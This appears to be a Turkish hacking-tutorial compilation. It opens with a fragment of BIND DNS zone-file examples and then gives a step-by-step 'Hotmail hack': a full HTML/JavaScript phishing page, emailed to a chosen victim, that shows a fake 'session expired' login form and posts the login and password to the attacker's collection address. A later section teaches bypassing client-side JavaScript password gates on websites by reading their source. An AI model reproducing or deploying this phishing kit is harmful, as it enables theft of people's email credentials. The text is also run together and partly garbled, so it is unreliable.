adresÖrnek: named.local dosyası; named.local 127.0.0.1 adresini local host’ a çevirmek için@ IN SOA ns1vestelnet.net.tr.rahsan.vestelnet.net.tr.(1 ;serial36000 ;her 100 saatte bir yenilenme3600 ;1 saatten sonar tekrar deneme3600000 ;1000 saatten sonar kayıdı sil (expire ol)36000 ;default ttl = 100 saat) IN NS ns1.vestelnet.net.tr1 IN PTR localhost Örnek:named.rev dosyasıVeezygo.com.tr domain için;IP’ nin host name’ e dönüşümünde kullanılır.@ IN SOA ns1vestelnet.net.tr.rahsan.vestelnet.net.tr.( 10099 ;serial 43200 ;refresh3600 ;retry3600000 ;expire2592000 ;minimum) IN NS ns1.vestelnet.net.tr IN NS ns2.vestelnet.net.tr68.192 IN PTR ns1.vestelnet.net.tr69.192 IN PTR ns2.vestelnet.net.trÖrnek: named.hosts dosyası;; adres ve host bilgisi yazılır;@IN SOA ns1.vestelnet.net.tr.rahsan.vestelnet.net.tr.( 10118 ;serial 36000 ;her 100 saatte bir yenile 3600 ;1 saatten sonar yenile 3600000 ;1000 saatten sonar kayıdı sil (expire ol) 36000 ;default ttl = 100 saat );name ve mail server’i be!
lirtir. IN NS ns1.vestelnet.net.tr IN NS ns2.vestelnet.net.tr IN MX mail.vestelnet.com;;localhost belirlemelocalhost IN A 127.0.0.1;zone belirtmens1 IN A 212.29.65.250ns2 IN CNAME ns2.vestelnet.net.tr IN MX mail.vestelnet.com;Host tablosunda gateway ve host girişleri bulunurnetlab-gw IN A 212.29.65.1; sub domainler belirtilircmpe IN NS vestelnet.net.trnamed.boot tanımlamsı yapıldıktan sonar, named’ in başlangıcı:#namedhata logları /usr/adm/messagesnamed çalışıyor, nslookup ile kayıtların doğruluğunu kontrol için kullanılıyor. Örnek:% nslookup server: ns1.vestelnet.net.tr address: 212.29.65.250 name: address:212.29.65.205named konfigürasyon kopyalarının oluşturulmasında izlenecek en kolay yolvarolan dosyanın kopyalanarak yeni dosyanın oluşturulmasıdır.
HOTMAIL HACK
Selamlar. Bu bölümde hotmail mail hesaplarını hack eden bir html scriptini inceleyeceğiz. Scriptin tamamı sayfanın sonunda bulacaksınız. Bu exploitin işleyiişi çok basit. Adamın hotmail adresine bir mail yolluyorsunuz. İçinde bu scriptin olduğu bir htm dosyası bulunuyor. Adam htm dosyasını açar açmaz tüm user name ve passwordları sizin belirlediğiniz mail adresine yollanıyor.
Şimdi adım adım işlemleri yapalım....
Adım 1: Önce kurban seçin.Hotmailden bir mail hesabı açın.
Adım 2: ********* ten bir mail adresi alın ben burda phyton olarak seçtim. olan bir mail adresi almış oldum. Web alanı sizi ilgilendirmiyor bu işlemde...
Adım 3: Aşağıdaki scriptteki 17 satırda bulunan satırda yapmanız gereken değişiklik var. <body onload="********.body.innerHTML=’<iframe scrolling=no frameborder=0 width=100% height=100% src=http://www.forumzone.it/index.htm></iframe>’;"> Şu an phyton hesabına göre "<FORM METHOD=POST ACTION=\"http://www.*********.com/cgi-bin/homestead/mail.pl?phyton\" target=\"_top\">" + bu şekilde gözüküyor. burada phyton yazan yere kendi ********* mail hesabınızı yazın. Adamın hotmail hesabı buraya yollanacak. Scriptte hemen altta...
-----------------------------------------------
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
********>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We’re Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.*********.com/cgi-bin/homestead/mail.pl?phyton\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail’s Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}
nomenulinks=top.submenu.********.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.********.links.target="work";
top.submenu.********.links.href= "javascript:getmess()";
}
noworklinks=top.work.********.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.********.links.target="work";
top.work.********.links.href= "javascript:getmess()";
}
</script>
</body>
</html>
-----------------------------------------------
Adım 4: Şimdi bir mesaj hazırlayın. İçine bu scripti yzdığınız html dosyasını yerleştirip yollayın.
Adım 5: Kurban bu maili kontrol edip html açar açmaz user ve pass ********* hesabınıza gelecektir.
Iyi hackler..
JAVA SCRIPT PASSWORD CRACK
Bazı sitelerde görürsünüz, "Bu bölüme girmek için şifre gerekir. Şifreyi sponsorumu ziyaret ederek alabilirsiniz" şeklinde mesajlar ve şifre isteyen pencereler çıkar. İşte biz bu yazıda bunlarda kurtulmanın yollarına göz atacağız. Elimde bulunan java-script şifreleme algoritmaları hakkında bilgi vereceğim. Aynı zamanda bunları debug etmeyi gösterecem. Bu sayede kolayca sizde istediğiniz sayfanın okdunu kıracaksınız. Tabi bunu kötü amaçlardan çok, sponsoruna tıklamanız konusunda ısrarcı olan kişiler üzerinde kullanın. Şimdi adım adım görelim;
1) Öncelikle bu tip passworları kırabilmek için sayfa kaynak koduna sahip olmanız gerek. Çoğunlukla bu sayfaların kaynak kodunu görmek imkansızdır. Çünkü sayfanın üzerine sağ tıklama şansınız yok. Bunu aşmak için önce butona tıkladığımızda hangi sayfaya gittiğini bulalım. Sitenin an sayfasında bir buton var. Buna tıklayın ve şifrenizi girin yazıyor. Burada yapacağımız sayfanın kaynak koduna bakamak ve buraya tıkladığımızda gideceğimiz sayfanın adını bulmak. Diyelimki şöyle bir satır bulduk.... <a href= "Gizli/index2.html" ..........
2) Şimdi bu sayfayı almamız gerek. Bunun için Getright çok uygun. Sitemizin adresi www.salak.com olsun. Bu sayfayı almak için getrightte Enter New URL girip yazıyoruz. Getright bunu bize indiriyor artık kodu trace etmekten başka bir şey kalmıyor.
Java Script TRACE;
Aşağıda bazı password scriptlerinin trace edilmesini göreceksiniz. Bu bir bakıma debug ama bir şey çalıştırma olayı yok tabiki.
1) Bu script oldukça sık kullanılıyor. Ekrana bir pop-up penceresi getiriyor. Böylece sayfanın kaynak kodunu görmek imkansızlaşıyor. Ama az önceki yöntemle alınabilir. Kod şöyle.
********************************
******** language="JavaScript">
<!--
var password = prompt("Burası sitenin özel bölümüdür lütfen passwordunuzu girin. \(It’s ’please’\)") gelen mesaj....
if (password == "FUCKOFF") { // Buradan Passwordu kolayca alıyoruz.
alert("Tesekkürler, \n \n Sifreniz dogru,girebilirsiniz.") // Şifremiz Doğruysa Çıkan mesaj
******** = "porn.htm" Doğru ise Gideceğimiz Adres
}
else {
******** = "../index1.htm" Yanlışsa Gidilecek Adres
}
// -->
</script>
******************************
2) Bu java script ise çok hoş özelliğe sahip. Ekrana bir keypad getiriyor. Sanki bir kapıyı açmak ister gibi şifre giriyoruz. Örneği ve kodu aşağıda,
Please enter the code 1234 to find out how this is done.
Kod; (Kodda keypadin bulunduğu bölüm kesilmiştir. Kodun açıklamasına gelince kodun yaptığı işlem bizim girdiğimiz rakamları bir biri ile çarpıp çıkan sonuç doğru ise rakamlardan oluşan adrese gitmek. Yani yukardaki örnekte 1234 girince script 1*2*3*4 olarak algılıyor. Çıkan sonucu 24 ile karşılaştırıyor. Eğer doğru ise 1234.html adresine gidiyor.
******** language="JavaScript">
var usermulcode=24 çarpımının kaç edeceği
var code=0
var mul=1
var digit=0
var fails=0
function Enter_code(number)
{
code=code*10+number rakam ekliyor
mul=mul*number u her rakam girişinde güncelliyor
********.codepad.thecode.value=code ekranda gözükmesini sağlıyor
digit++ ekler
if (digit==4) rakamlı şifre olacağı
{
if (mul==24) (yani çarpımın çıkacağı sonuç) 24 olursa,
{
********=code+".html" sonuna .html ekle ve o sayfaya git.
}
else
{
fails++
code=0
mul=1
digit=0
if (fails<3)
{
if (fails==1) // Şifre yanlışsa ekrana gelen mesaj.
{********.codepad.thecode.value="Try again"}
if (fails==2)
{********.codepad.thecode.value="Last time"}
}
else
{
********="index.html" yanlışsa gidilecek yer
********.codepad.thecode.value="Bye!" yanlışsa çıkacak mesaj
}
}
}
}
function keycodepad(mulcode)
......
</SCRIPT>
Burada yapılacak şey önce hangi rakama eşitlememiz gerektiği. Bunu bulunca bu sefer kaç rakamlı olacağı. Şimde elimizdekilere göre hemen olasılıkları deniyoruz. Zaten fazla bir olasılık olamayacağı için bulmakta pek zorlanmazsınız...
3) Şimdiki Javascript ise oldukça zorlayıcı bir script. Şimdilik en güvenli scriptlerden biri olarak gözüküyor. Çünkü kod hiç bir açık verimiyor. Siz user name yazıyorsunuz örneğin, "Phyton" (Büyük Küçük Harf Önemli). Şifre giriyorsunuz "4562" Script Phyton4562.html diye bir sayfa arıyor. Eğer varsa o sayfaya gidiyorsunuz. Şayet yoksa öyle bir sayfa olmadığı için klasik Browser sayfa bulunamadı hatası olan 404 PAGE NOT FOUND yazısına akraba oluyorsunuz.....
Sadece Scriptin Kodu;
******************************
<!--start stealth
function Getstats() {
window.status=(’Attempting to Login to user area.’)
var AccId;
var iName;
AccId = ********.iAccInput.iAccID.value --> Password değeri için değişken atanıyor (AccID)
iName = ********.iAccInput.iName.value --> User Name İçin değişken atanıyor.
if (AccId == "" || iName == "") --> Eğer password veya isim boşsa Aşağıdaki Hata mesajını çıkarıyor.
{
alert(’\nERROR\n\n\nYou must enter ALL Details,\nto View your statistics.\n’);
window.status=(’Missing data or Invalid. Check spelling and Ensure Names are in Correct Case.’)
}
else
{
var ********=("pw" + iName + AccId + ".html"); -->Bu satırda ise önce pw sonra username sonra pasword sonrada .html yazılıyor. Böylece "pwphyton55467.html" gibi bir sayfa oluyor.
this.********.href = ********; --> Böyle bir sayfa olup olmadığı kontrol ediliyor. Ve bu sayfaya gidiliyor.
window.status=(’ Verifying: ’ + iName + ’-’ + AccId + ’ Please wait........’);
}
}
// end hiding -->
*****************************************
Login
User Name:
Password:
[Login]
(You will need your account ID number & User name)
[ CASE SENSITIVE ]
Try
USERNAME: LetMeIn
PASSWORD: 254662
4) Bu scripti ise bir adult sitede gördüm. Hani olur ya sizde sponsorunun sayfasına gitmenizi oradan bir kelimeyi password olarak yazmanızı ister. İşte o tip bir script idi. Aşağıda görünüşü ve kaynak kodunu nasıl izliyeceğimiz var.
Tr *** sitesinden alınmıştır. (Gerçi site diğerlerinden daha iyi. Çünkü bir kere sponsor var..)
ENTERANCE
GIRIS
Username:
Password:
******** LANGUAGE="JavaScript">
<!-- Begin
function Login(){
var done=0;
var username=********.login.username.value; --> Kullanıcı adı için değişken atanıyor.
username=username.toLowerCase(); --> Değişkenin küçük harfle olması sağlanıyor
var password=********.login.password.value; --> Şifre için değişken atanıyor
password=password.toLowerCase(); --> Değişkenin küçük harfle olması sağlanıyor
if (username=="trsex" && password=="streaming") {
window.********="dexin123.htm"; done=1; } --> username ve şifre trsex ve streaming ise dexin123.htm adresine gidiyor.
if (username=="member2" && password=="password2") { window.********="http://www.javafile.com/javascripts/browsers/pass3.htm"; done=1; } -->Örnek Login Passwordleri ...
if (username=="member3" && password=="password3") { window.********="http://www.javafile.com/javascripts/browsers/pass3.htm"; done=1; } --> Örnek Login Passwordleri ..
if (done==0) { alert("Invalid login!"); } --> Eğer yukardaki şifre ve usernamelerde hiçbiri ile tutmazsa bizim yazdığımız Popup ile invalid Login yazısı geliyor.
}
// End -->
</script>
5) Advanced Password Script: Bu da hem username hemde şifrenizi bir popup menü ile kontrol ediyor. Popup menü olduğu için getright kullanarak kaynak sayfayı indireceğiz ve ondan sonra kodu trace edeceğiz.Kodu aşağıda olan scripti incelerseniz şifre ve kullanıcı adının yan yana yazıldığını ve ayrı ayrı göremediğimizi fark etmişsinizdir. İkisininde rakam olma durumunda çözmemizde çok zor olur. Ama scriptin açığı en üst satırda goodURL değişkenine atanan sayfa adresi. Browserimize bu adresi yazıyoruz ve BİNGO işte bu kadar.
******** language="Javascript">
<!--
var goodURL = "advpassword2.html" --> Eğer şifremiz doğruysa gideceğimiz adres.
alert("To access the following ********, you must pass a " --> Burada şifreli bir alana gireceğimiz haber veriliyor.
+"members-only, authorization test.\n \n At the appropriate "
